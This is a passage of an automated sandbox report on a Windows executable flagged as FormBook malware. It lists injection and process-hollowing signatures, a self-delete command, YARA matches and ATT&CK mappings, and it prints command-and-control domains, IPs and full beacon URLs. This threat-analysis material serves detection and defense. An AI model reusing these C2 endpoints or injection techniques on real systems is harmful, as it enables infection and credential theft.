          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F42990 mov eax, dword ptr fs:[00000030h]7_2_04F42990
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F3C182 mov eax, dword ptr fs:[00000030h]7_2_04F3C182
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4A185 mov eax, dword ptr fs:[00000030h]7_2_04F4A185
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1B171 mov eax, dword ptr fs:[00000030h]7_2_04F1B171
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1B171 mov eax, dword ptr fs:[00000030h]7_2_04F1B171
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1C962 mov eax, dword ptr fs:[00000030h]7_2_04F1C962
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F3B944 mov eax, dword ptr fs:[00000030h]7_2_04F3B944
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F3B944 mov eax, dword ptr fs:[00000030h]7_2_04F3B944
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4513A mov eax, dword ptr fs:[00000030h]7_2_04F4513A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4513A mov eax, dword ptr fs:[00000030h]7_2_04F4513A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F34120 mov eax, dword ptr fs:[00000030h]7_2_04F34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F34120 mov eax, dword ptr fs:[00000030h]7_2_04F34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F34120 mov eax, dword ptr fs:[00000030h]7_2_04F34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F34120 mov eax, dword ptr fs:[00000030h]7_2_04F34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F34120 mov ecx, dword ptr fs:[00000030h]7_2_04F34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F19100 mov eax, dword ptr fs:[00000030h]7_2_04F19100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F19100 mov eax, dword ptr fs:[00000030h]7_2_04F19100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F19100 mov eax, dword ptr fs:[00000030h]7_2_04F19100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F42AE4 mov eax, dword ptr fs:[00000030h]7_2_04F42AE4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F42ACB mov eax, dword ptr fs:[00000030h]7_2_04F42ACB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2AAB0 mov eax, dword ptr fs:[00000030h]7_2_04F2AAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2AAB0 mov eax, dword ptr fs:[00000030h]7_2_04F2AAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4FAB0 mov eax, dword ptr fs:[00000030h]7_2_04F4FAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F152A5 mov eax, dword ptr fs:[00000030h]7_2_04F152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F152A5 mov eax, dword ptr fs:[00000030h]7_2_04F152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F152A5 mov eax, dword ptr fs:[00000030h]7_2_04F152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F152A5 mov eax, dword ptr fs:[00000030h]7_2_04F152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F152A5 mov eax, dword ptr fs:[00000030h]7_2_04F152A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4D294 mov eax, dword ptr fs:[00000030h]7_2_04F4D294
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4D294 mov eax, dword ptr fs:[00000030h]7_2_04F4D294
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F5927A mov eax, dword ptr fs:[00000030h]7_2_04F5927A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FCB260 mov eax, dword ptr fs:[00000030h]7_2_04FCB260
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FCB260 mov eax, dword ptr fs:[00000030h]7_2_04FCB260
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 172.67.223.7 80
Source: C:\Windows\explorer.exe | Network Connect: 103.88.34.80 80
Source: C:\Windows\explorer.exe | Network Connect: 184.168.131.241 80
Source: C:\Windows\explorer.exe | Network Connect: 217.160.0.236 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 170.178.168.203 80
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Section loaded: unknown target: C:\Users\user\Desktop\Nz7NA3F7z7.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Thread register set: target process: 3388
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\colorcpl.exe | Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 13E0000
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Process created: C:\Users\user\Desktop\Nz7NA3F7z7.exe 'C:\Users\user\Desktop\Nz7NA3F7z7.exe'
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Nz7NA3F7z7.exe'
Source: explorer.exe, 00000003.00000000.225318528.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
Source: explorer.exe, 00000003.00000002.484866300.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 00000007.00000002.485521812.00000000037A0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000002.484866300.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 00000007.00000002.485521812.00000000037A0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.484866300.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 00000007.00000002.485521812.00000000037A0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.484866300.0000000001980000.00000002.00000001.sdmp, colorcpl.exe, 00000007.00000002.485521812.00000000037A0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Nz7NA3F7z7.exe.22f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Nz7NA3F7z7.exe.22f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Shared Modules 1; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection 512; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Virtualization/Sandbox Evasion 3; Process Injection 512; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 4; Software Packing 12; Steganography
Credential Access: Input Capture 1; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery 131; Virtualization/Sandbox Evasion 3; Process Discovery 3; Remote System Discovery 1; File and Directory Discovery 2; System Information Discovery 13
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Input Capture 1; Archive Collected Data 1; Clipboard Data 1; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Encrypted Channel 1; Ingress Tool Transfer 1; Non-Application Layer Protocol 2; Application Layer Protocol 12; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: System Shutdown/Reboot 1; Device Lockout; Delete Device Data

Behavior Graph (ID: 361772, Sample: Nz7NA3F7z7.exe, Start date: 03/03/2021, Architecture: WINDOWS, Score: 100)

Start
  DNS/IP: www.myfeezinc.com; www.explorerthecity.com; www.usopencoverage.com
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures
  started: Nz7NA3F7z7.exe
    dropped: C:\Users\user\AppData\...\eeysn2cunceh9.dll, PE32
    Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
    started: Nz7NA3F7z7.exe
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      injected: explorer.exe
        DNS/IP: www.myfeezinc.com 170.178.168.203, 49741, 80 ST-BGPUS United States; www.glowtheblog.com 217.160.0.236, 49740, 80 ONEANDONE-ASBrauerstrasse48DE Germany; 8 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit)
        started: colorcpl.exe
          DNS/IP: www.856380692.xyz
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          started: cmd.exe
            started: conhost.exe

Source | Detection | Scanner | Label
Nz7NA3F7z7.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
1.1.Nz7NA3F7z7.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.Nz7NA3F7z7.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
0.2.Nz7NA3F7z7.exe.22f0000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.0.Nz7NA3F7z7.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
1.2.Nz7NA3F7z7.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.2.colorcpl.exe.5427960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.0.Nz7NA3F7z7.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
7.2.colorcpl.exe.11225c8.1.unpack | 100% | Avira | TR/Patched.Ren.Gen

No Antivirus matches
Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.glowtheblog.com/nsag/?Bd68427=HzZPNJQ+T/L7/MBs4vfaT6k2sBckkYigm/Q2Kch6th6kZXuKq++LfRIjkyQoyiPFVyMQ&Ntfttf=nlvt | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.myfeezinc.com/nsag/?Ntfttf=nlvt&Bd68427=AXehkXJ24fX3Q+umAOPXC/XvfFX0gl1EYu2dc8RW2os5zkvGOL3BkU/yF/W58Bsr/nBR | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
www.856380692.xyz/nsag/ | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
https://www.123-reg-new-domain.co.uk/iframe.html | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.worldsourcecloud.com/nsag/?Ntfttf=nlvt&Bd68427=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4EBz+9KVsHtfB | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.wholesalerbargains.com/nsag/?Ntfttf=nlvt&Bd68427=S2rwVw3s97Y3rUXATn0CJ3djiO7xqRLsdPZLFd7esiUzXfKx0EjNJIkpU7K33DVUY0dk | 0% | Avira URL Cloud | safe
http://www.tencenttexts.com/nsag/?Ntfttf=nlvt&Bd68427=1KNBKkR/3sxsfy5Hm2m4k9rliP52H6WM2eUoblDVMc3evr5lbTgPZczIDguYEb443quL | 0% | Avira URL Cloud | safe


Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.glowtheblog.com | 217.160.0.236 | true | true | | unknown
tencenttexts.com | 184.168.131.241 | true | true | | unknown
www.explorerthecity.com | 91.195.240.94 | true | true | | unknown
wholesalerbargains.com | 34.102.136.180 | true | true | | unknown
www.856380692.xyz | 103.88.34.80 | true | true | | unknown
www.myfeezinc.com | 170.178.168.203 | true | true | | unknown
www.usopencoverage.com | 94.136.40.51 | true | false | | unknown
www.worldsourcecloud.com | 172.67.223.7 | true | true | | unknown
www.evoslancete.com | unknown | unknown | true | | unknown
www.tencenttexts.com | unknown | unknown | true | | unknown
www.clericallyco.com | unknown | unknown | true | | unknown
www.wholesalerbargains.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.glowtheblog.com/nsag/?Bd68427=HzZPNJQ+T/L7/MBs4vfaT6k2sBckkYigm/Q2Kch6th6kZXuKq++LfRIjkyQoyiPFVyMQ&Ntfttf=nlvt | true | Avira URL Cloud: safe | unknown
http://www.myfeezinc.com/nsag/?Ntfttf=nlvt&Bd68427=AXehkXJ24fX3Q+umAOPXC/XvfFX0gl1EYu2dc8RW2os5zkvGOL3BkU/yF/W58Bsr/nBR | true | Avira URL Cloud: safe | unknown
www.856380692.xyz/nsag/ | true | Avira URL Cloud: safe | low
http://www.worldsourcecloud.com/nsag/?Ntfttf=nlvt&Bd68427=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4EBz+9KVsHtfB | true | Avira URL Cloud: safe | unknown
http://www.wholesalerbargains.com/nsag/?Ntfttf=nlvt&Bd68427=S2rwVw3s97Y3rUXATn0CJ3djiO7xqRLsdPZLFd7esiUzXfKx0EjNJIkpU7K33DVUY0dk | true | Avira URL Cloud: safe | unknown
http://www.tencenttexts.com/nsag/?Ntfttf=nlvt&Bd68427=1KNBKkR/3sxsfy5Hm2m4k9rliP52H6WM2eUoblDVMc3evr5lbTgPZczIDguYEb443quL | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.223.7 | unknown | United States | 13335 | CLOUDFLARENETUS | true
103.88.34.80 | unknown | China | 136188 | CHINATELECOM-ZHEJIANG-NINGBO-IDCNINGBOZHEJIANGProvince | true
217.160.0.236 | unknown | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
170.178.168.203 | unknown | United States | 46844 | ST-BGPUS | true
184.168.131.241 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 361772
Start date: 03.03.2021
Start time: 08:06:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 7s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Nz7NA3F7z7.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@11/6
EGA Information: Failed
HDC Information:
• Successful, ratio: 29.2% (good quality ratio 27%)
• Quality average: 74%
• Quality standard deviation: 30.7%
HCA Information:
• Successful, ratio: 87%
• Number of executed functions: 98
• Number of non-executed functions: 64
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• Excluded IPs from analysis (whitelisted): 52.147.198.201, 204.79.197.200, 13.107.21.200, 93.184.220.29, 104.42.151.234, 104.43.139.144, 13.88.21.125, 52.255.188.83, 184.30.20.56, 51.11.168.160, 8.253.207.121, 8.248.121.254, 67.26.73.254, 8.241.9.126, 8.241.11.254, 23.32.238.177, 23.32.238.234, 20.54.26.129
• Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net
• Report size getting too big, too many NtQueryValueKey calls found.
                                                          No simulations
                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          103.88.34.80LdryowLXJB.exeGet hashmaliciousBrowse
                                                            b2lTHeTto0.exeGet hashmaliciousBrowse
                                                              PO 120610361.xlsxGet hashmaliciousBrowse
                                                                U6RI0SDRS2.exeGet hashmaliciousBrowse
                                                                  JJux8lxZRj.exeGet hashmaliciousBrowse
                                                                    HBL VRN0924588.xlsxGet hashmaliciousBrowse
                                                                      G6FkfjX5Ow.exeGet hashmaliciousBrowse
                                                                        PO#652.exeGet hashmaliciousBrowse
                                                                          Certificate of Origin- BEIJING & B GROUP.exeGet hashmaliciousBrowse
                                                                            RFQ ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                              osJ3VOYzR5.rtfGet hashmaliciousBrowse
                                                                                BsMdJnus2L.exeGet hashmaliciousBrowse
                                                                                  Order.exeGet hashmaliciousBrowse
                                                                                    217.160.0.23629Order pdf.exeGet hashmaliciousBrowse
                                                                                    • www.investors.black/ca/
                                                                                    34.102.136.180LdryowLXJB.exeGet hashmaliciousBrowse
                                                                                    • www.hakimkhawatmi.com/nsag/?OjQdq6=9Tl2KXc+hK/yUtBx8vpX/czO0Yy7ZBOWuVGV2PRDYpIJ5Hkcqzipl+nucuOR0YYE6jnP&TZ=FjUt0Xc
                                                                                    OVwf3NwhY3.exeGet hashmaliciousBrowse
                                                                                    • www.baldheadbilly.com/hks/?2de=XnzLMfxH&-Z=5DpztBGFNILOUcTfnypBt9Mq+WcGvwdIgNyzFivyJumM76wq3XnPErAuCN247b23uUTG
                                                                                    winlog.exeGet hashmaliciousBrowse
                                                                                    • www.wholeholistichealth.com/ivay/?v6t=48s8GfR0pKAVVGrS/+07uG5rt2JCeQz1hQFFgtKX2hEN3FS1DFrBqQNbglg+QUqIpgZT&nt=VXELdRqP
                                                                                    5CLX0aUFemBe4lP.exeGet hashmaliciousBrowse
                                                                                    • www.southwesterboats.com/ame8/?-Zu8Zp=YibtMwum0SvNFVbrCItddygoWSyUmK+2xk3Efj2vFifRGIdUT04RUA1YqOO5dt88HQdt&Dxlpd=2djD
                                                                                    SecuriteInfo.com.Trojan.Inject4.6572.18135.exeGet hashmaliciousBrowse
                                                                                    • www.pciglass.com/gypo/?lnPh=TxlhfFH&Dz=d9Td64cc51pjWzqk4whrsRBiDMw+Dv5uUAQ+atE4KVcxvy7dCZj3hUtJzXjDyX3Am+PI
                                                                                    dwg.exeGet hashmaliciousBrowse
                                                                                    • www.altsfram.com/ripw/?YL0=8Nf6ku3go9lIx7EXwguFN4u+ozF9cTxTJQgM1N+BjZzk41CS1AxXrTSLzn6fg/LfXfGB&DhAH08=9rzdODV81V
                                                                                    REF221.exeGet hashmaliciousBrowse
                                                                                    • www.odsgroupusa.com/u9cd/?kDKl=LTvbqs2qSrEtu2oc9ZBfGgqoFsGK8OX0N1ikV+MTjRgm8dfiDIllkvRNetIMUSWUkxhOAkjylw==&DzuD=QnjHBx2xo
                                                                                    RtiNKKhckU.exeGet hashmaliciousBrowse
                                                                                    • www.fruitsinbeers.com/ffw/?00D=qBZpAr0pwRYLsZL&ndpLn6c=b6L+UOVcWa0t15ouHTOLrxL7UlkQja/WPpXHKl1ivZgW+/yS0QWwjv+ao5Rg679GBpw8
                                                                                    Order 1759-pdf.exeGet hashmaliciousBrowse
                                                                                    • www.nutritionalproductions.com/uqf5/?EZA0x8=VnpGld+QUK8yus86LK6GeF5MHljAYsKUpXGs/MfXJqKbbzqdskqmJqodOH15iHOn50VuwIzKFw==&GzrLH=VBZlkvuh1J1t_b
                                                                                    RFQ 204871 AGC_pdf.exeGet hashmaliciousBrowse
                                                                                    • www.findingyourbranch.com/nu8e/?GFND=HV9yUONS4KA0L0c6l+CFXH3fe0HX4tKnX8+8FhcVfibHBBFEql21B5XTAFxUltc/rjb1&Jtx=XVy8pRgx
                                                                                    PO 210302-011.exeGet hashmaliciousBrowse
                                                                                    • www.paquitotransportationllc.com/ktz/?PtCXRL2=JMXKl+3K3KPbV/DQYhflj23UNPfz90cW2//Wc9AzMKM4/opGe7L3M2PNiL89l0D2ef/i&V6Ah9=_0GxCdG8B0X0
                                                                                    Invoice-0898764_pdf.exeGet hashmaliciousBrowse
                                                                                    • www.furrytail.pet/xgxp/?tXUt=5n0JhPVaKrchLlfv26Zq4DXM/0jD4q1VDgFEzUPlF2rso9lf6FfSb2aVcmMhvNGx1hUE&Cjp4a=ftxlnN6p
                                                                                    PO_210301.exe.exeGet hashmaliciousBrowse
                                                                                    • www.skatinggoosefarm.com/kbc/?T8Ud-te=kPw0OkDVeBqlX+Nd2sC+wK13jjG9T4wvPDzpBRB+YKHCRzYm9QoPUpP7kZiPd/I11pKc&U48Ho=NtetPLUX-pOH6Vkp
                                                                                    INVOICE-01-03-2021.exeGet hashmaliciousBrowse
                                                                                    • www.idowellbeingoutdoors.com/ame8/?JfEx9PSX=bSNRDfouWmCpHrtSwAzqDtCd7CBFxBanYXSx9p43ryr6wxptuO5mMSKmqsTSCD240kUn&ojn0sr=RVlPdV
                                                                                    8QGglvUeYO.exeGet hashmaliciousBrowse
                                                                                    • www.trucktiresdirect.net/qef6/?FDHH=FQEtPSkz80CxgXgcOOi6rBlloiOK2hGatG8UTKVevdzK7vsAog45RkTrPeFtAvOf/XsI&Rl=VtX4c
                                                                                    SAO_NCL INTER LOGISTICS (S) PTE LTD.exeGet hashmaliciousBrowse
                                                                                    • www.ketamineinfusiontexas.com/vxwp/?FZU4DvG=RX7AK5fteFIPXrRxTwMnWf9UYNTxM3X2CRcDJrKMlPVxj+AOcnrTFr4+xKRfQYA1k/6X&DzrTA=VDKPT4kXex_d1V
                                                                                    payment slip_pdf.exeGet hashmaliciousBrowse
                                                                                    • www.nguyenngoctue.com/hua6/?pP-=EFQDPLp0sdi0&adsDdLr=o3VZw1fcRuoUF3CTAYD7K5r5mFexCmH7Ani/9zaiM9lHi3wZG5vhW6jdHjyNbK5h31Dz
                                                                                    dgKMrfjI84.exeGet hashmaliciousBrowse
                                                                                    • www.harryballard.net/mjs/?t6Ah=CWqPZ4Oyg6xNe2b3vj69wXlmdbu58Oelz2e9RYbKtL17dBFPpmaNgUhksb7z6Z1XRdMj&9r4Tq=J4k0
